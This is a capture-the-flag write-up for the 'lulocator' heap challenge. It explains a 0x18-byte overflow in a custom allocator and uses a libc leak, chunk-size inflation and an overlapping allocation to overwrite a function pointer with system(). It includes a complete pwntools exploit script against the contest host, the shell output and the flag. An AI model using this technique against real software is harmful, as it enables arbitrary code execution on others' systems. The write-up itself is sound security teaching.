Lulocator

Eh4x CTFby smothy

lulocator - EH4X CTF 2026

Category: Binary Exploitation | Points: 500 | Solves: 0 (first blood baby) Author: nrg & the_moon_guy

Who needs that buggy malloc? Made my own completely safe lulocator.

nc chall.ehax.in 40137


TL;DR

Custom heap allocator with a write command that lets you send size + 0x18 bytes into a buffer that only holds size bytes. Classic off-by-onetwenty-four. We inflate a freed chunk's size header, get an overlapping allocation over a victim object, overwrite its function pointer to system, fill its data with /bin/sh, and pop a shell.


0x00 - First Look

We get a stripped ELF binary and a libc (glibc 2.35). Let's check what we're working with:

$ pwn checksec lulocator Arch: amd64-64-little RELRO: No RELRO <-- GOT is writable, free real estate Stack: No canary found <-- stack smash? maybe later NX: NX enabled <-- no shellcode on stack/heap PIE: No PIE (0x400000) <-- addresses are fixed, nice

No PIE + No RELRO is basically the binary saying "please hack me bro".

The binary presents a menu-driven heap challenge:

=== lulocator === 1) new -- allocate an object with custom size 2) write -- write data to an object 3) delete -- free an object 4) info -- leak object address + stdout ptr + size 5) set_runner -- pick an object as "the runner" 6) run -- call runner->func_ptr(runner->data) 7) quit

So we have a classic note-style pwn challenge but with a twist - there's a custom allocator ("lulocator") instead of glibc malloc, and objects have a function pointer that gets called via run. That function pointer is our ticket to code execution.


0x01 - Reversing the Allocator

Since the binary is stripped, we gotta reverse everything from raw disassembly. Here's what I figured out:

The Arena

The allocator mmaps a 0x40000-byte region at startup. It uses a simple bump allocator for new allocations and a circular doubly-linked free list for freed chunks. The free list sentinel lives at a fixed address 0x404850 in .data (no PIE = we know this address).

Chunk Layout

Each chunk on the heap looks like:

+----------+---------------------------+ | Header | Data | | (8 bytes)| (aligned to 16 bytes) | +----------+---------------------------+ ^ | +-- size | flags (bit 0 = allocated)
  • header & ~0xF = chunk size (total, including header)
  • header & 1 = allocated bit (1 = in use, 0 = free)
  • When free, the data area stores: fwd pointer (8 bytes) + bwd pointer (8 bytes)

Object Layout

When you do new(size), the allocator does lu_alloc(size + 0x28). The returned memory is laid out as:

Object structure (returned by lu_alloc): +0x00: field_0 (8 bytes) -- unused, zeroed +0x08: field_1 (8 bytes) -- unused, zeroed +0x10: func_ptr (8 bytes) -- function pointer (default: print_mail) +0x18: out_ptr (8 bytes) -- FILE* stdout +0x20: size (8 bytes) -- user-requested size +0x28: data[size] -- user data buffer

The run command does: runner->func_ptr(runner + 0x28) -- it calls the function pointer with a pointer to the data buffer as the argument.

If we can overwrite func_ptr to system and put /bin/sh in the data buffer... game over.

Before/After


0x02 - Finding the Bug

Here's the write command logic (simplified pseudocode):

c
void cmd_write(void) {
    int idx = read_int("idx: ");
    obj_t *obj = slots[idx];
    uint64_t len = read_ull("len: ");

    // THE BUG IS RIGHT HERE OFFICER
    if (len > obj->size + 0x18) {
        puts("too long");
        return;
    }

    read_all(0, obj->data, len);   // reads into data buffer
    // ... null termination ...
}

The check allows writing up to obj->size + 0x18 bytes, but the data buffer is only obj->size bytes long.

That's a 0x18 (24) byte heap overflow.

Heap Overflow

24 bytes overflow means we can corrupt:

  • 8 bytes of the next chunk's header
  • 8 bytes of the next chunk's data[0] (fwd pointer if free)
  • 8 bytes of the next chunk's data[8] (bwd pointer if free)

0x03 - The Leak (free info lol)

The info command is literally handing us addresses on a silver platter:

[info] addr=0x7f1234560008 out=0x7f12345bf780 len=16 ^^^ This is stdout (FILE*) = libc address!

The out field contains the address of _IO_2_1_stdout_ inside libc. Since we know the libc version (2.35), we just subtract the known offset to get libc base:

python
libc_base = leaked_stdout - 0x21b780   # offset of _IO_2_1_stdout_ in libc 2.35
system    = libc_base + 0x50d70        # offset of system()

That was easy. Thanks for the free leak, challenge author.


0x04 - The Exploit Strategy: Overlapping Chunks

OK so we have a 24-byte overflow and we need to overwrite an object's func_ptr at offset +0x10. The overflow only reaches data[0] and data[8] (offsets +0x00 and +0x08) of the next object -- not far enough to hit func_ptr.

But we can do something sneaky: inflate a freed chunk's size to create an overlapping allocation.

Here's the plan:

Step 1: Set up the heap

Allocate A (size=0x10) --> slot 0, chunk size 0x40 Allocate B (size=0x10) --> slot 1, chunk size 0x40 Allocate C (size=0x10) --> slot 2, chunk size 0x40 Heap layout: +--------+--------+--------+ | A 0x40 | B 0x40 | C 0x40 | +--------+--------+--------+

Step 2: Free B

B goes to the free list. Its header now says size=0x40 (allocated bit cleared), and its data area contains fwd/bwd pointers to the sentinel (0x404850).

Heap State

Step 3: Overflow from A into B

Write 0x28 bytes to A (that's 0x10 of legit data + 0x18 overflow):

python
overflow = b'A' * 0x10       # A's data (padding)
overflow += p64(0x80)        # B's header: inflate 0x40 -> 0x80 !!
overflow += p64(0x404850)    # B->fwd: keep valid (sentinel)
overflow += p64(0x404850)    # B->bwd: keep valid (sentinel)

Key insight: we keep the fwd/bwd pointers correct so the safe-unlink integrity check passes when B is reallocated. The allocator checks fwd->bwd == node && bwd->fwd == node before unlinking. Since B is the only element on the free list, both fwd and bwd point to the sentinel, and the sentinel's fwd/bwd both point to B. Our overflow doesn't change fwd/bwd, so the check passes.

+--------+------------------+ | A 0x40 | B "FREE" sz=0x80 | <-- B now thinks it's 0x80 bytes | | (covers B AND C!) | +--------+------------------+

Overflow Detail

Step 4: Allocate D (size=0x50) - gets the inflated chunk

When we allocate D with size 0x50, the allocator needs a chunk of total size align16(0x50 + 0x28 + 0x8) = 0x80. It finds B on the free list with (fake) size 0x80 -- perfect fit! D gets allocated right on top of B's old location, but its data area now extends into C's territory.

+--------+----------------------------------+ | A 0x40 | D (size=0x50) | | | D_meta | D_data[0x50] | | | | .....|C_hdr|C_meta|C_dat| +--------+----------------------------------+ ^ ^ ^ | | | We control ALL of this through D's write!

Step 5: Write through D to corrupt C

Now we write to D's data area. Since D overlaps with C, we can overwrite C's entire object metadata:

python
payload  = b'\x00' * 0x10     # gap (D data before C starts)
payload += p64(0x41)           # C's chunk header (keep original)
payload += p64(0)              # C->field_0
payload += p64(0)              # C->field_1
payload += p64(system_addr)    # C->func_ptr = system()  <-- BOOM
payload += p64(0)              # C->out_ptr
payload += p64(0x10)           # C->size
payload += b'/bin/sh\x00'      # C->data = "/bin/sh"

Step 6: Set runner to C and RUN

python
set_runner(c_idx)   # runner = C
run()               # calls C->func_ptr(C->data) = system("/bin/sh")
set_runner(C) ---> runner = C run() ---> C->func_ptr(C + 0x28) ---> system("/bin/sh")

0x05 - Putting It All Together

Here's the full attack flow as a diagram:

6-Step Attack Flow


0x06 - The Exploit Script

python
#!/usr/bin/env python3
from pwn import *

context.arch = 'amd64'

# Libc offsets (glibc 2.35 - Ubuntu)
LIBC_STDOUT = 0x21b780
LIBC_SYSTEM = 0x50d70
SENTINEL    = 0x404850       # free list sentinel (no PIE = fixed addr)

p = remote('chall.ehax.in', 40137)
p.recvuntil(b'=== lulocator ===')

# --- Helper functions ---
def new(size):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'size: ', str(size).encode())
    p.recvuntil(b'[new] index=')
    return int(p.recvline().strip())

def write(idx, data):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.sendlineafter(b'len: ', str(len(data)).encode())
    p.sendafter(b'data: ', data)
    p.recvuntil(b'[wrote]')

def delete(idx):
    p.sendlineafter(b'> ', b'3')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.recvuntil(b'[deleted]')

def info(idx):
    p.sendlineafter(b'> ', b'4')
    p.sendlineafter(b'idx: ', str(idx).encode())
    line = p.recvline_contains(b'[info]').decode()
    parts = line.split()
    addr = int(parts[1].split('=')[1], 16)
    out  = int(parts[2].split('=')[1], 16)
    return addr, out

def set_runner(idx):
    p.sendlineafter(b'> ', b'5')
    p.sendlineafter(b'idx: ', str(idx).encode())
    p.recvuntil(b'[runner set]')

def run():
    p.sendlineafter(b'> ', b'6')

# === PHASE 1: LEAK ===
A = new(0x10)                          # slot 0
_, stdout_leak = info(A)
libc_base = stdout_leak - LIBC_STDOUT
system    = libc_base + LIBC_SYSTEM
log.success(f"libc: {hex(libc_base)}")
log.success(f"system: {hex(system)}")

# === PHASE 2: SETUP ===
B = new(0x10)                          # slot 1 (sacrifice)
C = new(0x10)                          # slot 2 (target)
delete(B)                              # B -> free list

# === PHASE 3: OVERFLOW & INFLATE ===
overflow  = b'A' * 0x10                # A's data (junk)
overflow += p64(0x80)                  # inflate B's size: 0x40 -> 0x80
overflow += p64(SENTINEL)              # keep fwd valid
overflow += p64(SENTINEL)              # keep bwd valid
write(A, overflow)

# === PHASE 4: OVERLAPPING ALLOC ===
D = new(0x50)                          # gets inflated B, overlaps C

# === PHASE 5: CORRUPT C ===
payload  = b'\x00' * 0x10              # gap
payload += p64(0x41)                   # C chunk header
payload += p64(0) * 2                  # field_0, field_1
payload += p64(system)                 # C->func_ptr = system
payload += p64(0)                      # C->out_ptr
payload += p64(0x10)                   # C->size
payload += b'/bin/sh\x00'              # C->data
write(D, payload)

# === PHASE 6: PROFIT ===
set_runner(C)
run()                                  # system("/bin/sh")

p.interactive()

0x07 - Shell!

$ python3 exploit.py [+] Opening connection to chall.ehax.in on port 40137: Done [+] libc: 0x765e68e9f000 [+] system: 0x765e68eefd70 [*] Switching to interactive mode $ id uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) $ cat flag* EH4X{unf0rtun4t3ly_th3_lul_1s_0n_m3}

0x08 - Key Takeaways (educational stuff)

Why did this work?

ProtectionStatusImpact
PIEOFFAll binary addresses are fixed -- we know the sentinel at 0x404850
RELRONoneGOT is writable (didn't even need it, but nice to have)
CanaryOFFStack smashing possible (didn't need it either)
NXONCan't exec shellcode on heap/stack, so we use system()

Concepts used in this exploit:

  1. Heap Overflow -- The write command has an off-by-0x18 bug. Always check boundary conditions in allocators! The check was len <= size + 0x18 instead of len <= size.

  2. Chunk Size Inflation -- By overwriting a free chunk's size header to a larger value, we trick the allocator into returning an allocation that overlaps with adjacent chunks. This is a classic heap exploitation primitive.

  3. Overlapping Allocations -- Once we have a chunk that overlaps another object, we can read/write the victim object's internal metadata through the overlapping chunk.

  4. Function Pointer Hijack -- The object had a function pointer at a known offset. By overwriting it to system() and controlling the argument (the data buffer), we achieve arbitrary command execution.

  5. Free List Integrity Bypass -- The allocator had a safe-unlink check (fwd->bwd == node && bwd->fwd == node). We bypassed it by keeping the fwd/bwd pointers valid during our overflow. The check only verifies link consistency, not size consistency.

The vulnerability in one picture:

Vulnerability Summary

Similar real-world bugs:

  • CVE-2021-27365 (Linux kernel iSCSI) -- heap buffer overflow due to incorrect size check
  • Pretty much any custom allocator that rolls its own bounds checking instead of using well-tested implementations

The lesson? Don't write your own malloc unless you really know what you're doing.


Flag: EH4X{unf0rtun4t3ly_th3_lul_1s_0n_m3}

unfortunately the lul is on me -- yeah, it really was on the lulocator lol


GG to nrg & the_moon_guy for a clean pwn challenge. 500 points well earned.